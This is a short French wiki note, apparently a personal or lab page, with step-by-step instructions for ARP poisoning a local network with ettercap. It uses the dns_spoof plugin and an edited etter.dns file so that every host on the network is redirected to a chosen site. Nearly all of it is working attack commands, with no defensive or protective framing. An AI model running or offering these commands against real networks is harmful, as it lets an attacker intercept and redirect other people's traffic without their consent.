ARP Poisoning

sudo ettercap -T -q -F '/usr/share/ettercap/testF.ef' -i eth0 -M ARP
Ensuite tu appuies sur la touche 'p' et une liste plugin va s'afficher. De là tu entres le nom du plugin à activer et tu appuies sur la touche 'entrée'.

Exemple :

Pour que tout le monde voit une certaine page web, il faut éditer le fichier

sudo nano /usr/share/ettercap/etter.dns

ou selon distrib

sudo nano /etc/ettercap/etter.dns

Tu commentes toutes les lignes sauf une ou tu entres par exemple :

  • .* A 212.95.67.222

ou pour Radio campus TRyphon > serveur Labo Campus (à tester)

  • .tryphon.eu A 62.210.177.86

Ensuite :

sudo ettercap -T -q -F '/usr/share/ettercap/testF.ef' -i eth0 -M ARP // //

puis touche 'p' et tu entres 'dns_spoof' puis touche 'entrée'

Et voilà, tout le réseau devrait être routé sur le site du Figaro

  • arp_poisoning.txt
  • Dernière modification: 2018/10/18 10:48
  • par serge